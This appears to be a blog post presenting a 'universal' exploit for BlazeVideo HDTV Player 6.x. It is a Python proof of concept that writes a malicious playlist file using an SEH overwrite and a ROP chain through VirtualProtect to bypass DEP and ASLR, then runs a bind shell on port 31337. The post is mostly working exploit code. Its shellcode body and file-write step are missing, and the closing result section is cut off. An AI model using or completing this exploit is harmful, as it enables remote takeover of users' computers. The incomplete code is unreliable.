Hi again, we tried to make a universal DEP and ASLR bypass version on BlazeVideo HDTV Player 6.x. This exploit is already public, but we just want to make it universal.
Take a look at mona.py 🙂 awesome tool developed by corelanc0d3r and his team
So here is the poc, it will bind to port 31337
import struct
file = ‘blazevideo-universal.plf’
totalsize = 5000
junk = ‘A’ * 872
align = ‘B’ * 136
#we don’t need nseh
seh = ‘\x4a\x53\x30\x61’ # ADD ESP,800 # RETN
rop = ‘\x03\x60\x32\x61’ * 10 # RETN (ROP NOP)
rop+= ‘\x7a\x34\x05\x64’ # POP EDX # RETN
rop+= ‘\x08\x11\x01\x10’ # ptr to VirtualProtect()
rop+= ‘\x03\x05\x01\x64’ # PUSH EDX # POP EAX # POP ESI # RETN
rop+= ‘\x41\x41\x41\x41’ # Filler
rop+= ‘\x9f\x94\x60\x61’ # MOV ECX,DWORD PTR DS:[EDX] # POP SOMETHING
rop+= ‘\x41\x41\x41\x41’ * 3 # Filler
rop+= ‘\x18\x42\x60\x61’ # PUSH ECX # ADD AL,5F # XOR EAX,EAX
rop+= ‘\x41\x41\x41\x41’ * 3 # Filler
rop+= ‘\xa6\xd1\x03\x64’ # POP EBP # RETN
rop+= ‘\x41\x41\x41\x41’ * 3 # Filler
rop+= ‘\x5A\x05\x61\x61’ # push esp # ret 0c
rop+= ‘\xA8\x3E\x32\x61’ # POP EAX # RETN
rop+= ‘\x9D\x79\x39\xA1’ # 0x00000501-> ebx
rop+= ‘\xfc\x03\x02\x64’ # ADD EAX,5EC68B64 # RETN
rop+= ‘\x7b\xd3\x63\x61’ # PUSH EAX # ADD AL,5E
rop+= ‘\x07\x68\x62\x61’ # XOR EAX,EAX # RETN
rop+= ‘\xfc\x03\x02\x64’ # ADD EAX,5EC68B64 # RETN
rop+= ‘\x7a\x34\x05\x64’ # POP EDX # RETN
rop+= ‘\xDC\x74\x39\xA1’ # 0x00000040-> edx
rop+= ‘\xfb\x07\x31\x61’ # ADD EDX,EAX # MOV EAX,EDX
rop+= ‘\xc0\x1f\x60\x61’ # POP ECX # RETN
rop+= ‘\x40\x03\x35\x60’ # Writable location
rop+= ‘\x07\x9e\x32\x61’ # POP EDI # RETN
rop+= ‘\x03\x60\x32\x61’ # RETN (ROP NOP)
rop+= ‘\x95\x65\x60\x61’ # POP EAX # RETN
rop+= ‘\x90\x90\x90\x90’ # nop
rop+= ‘\xF1\x0C\x62\x61’ # PUSHAD # RETN
nop = ‘\x90’ * 32
# windows/shell_bind_tcp – 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=31337, RHOST=, EXITFUNC=process,
shellcode = (
sisa = ‘C’ * (totalsize – len(seh+rop+nop+shellcode))
payload = junk+seh+align+rop+nop+shellcode+sisa
f = open(file,’w’)
print “Author: modpr0be”
print “File”,file, “successfully created”
here is the result, tested on Windows 7 SP1: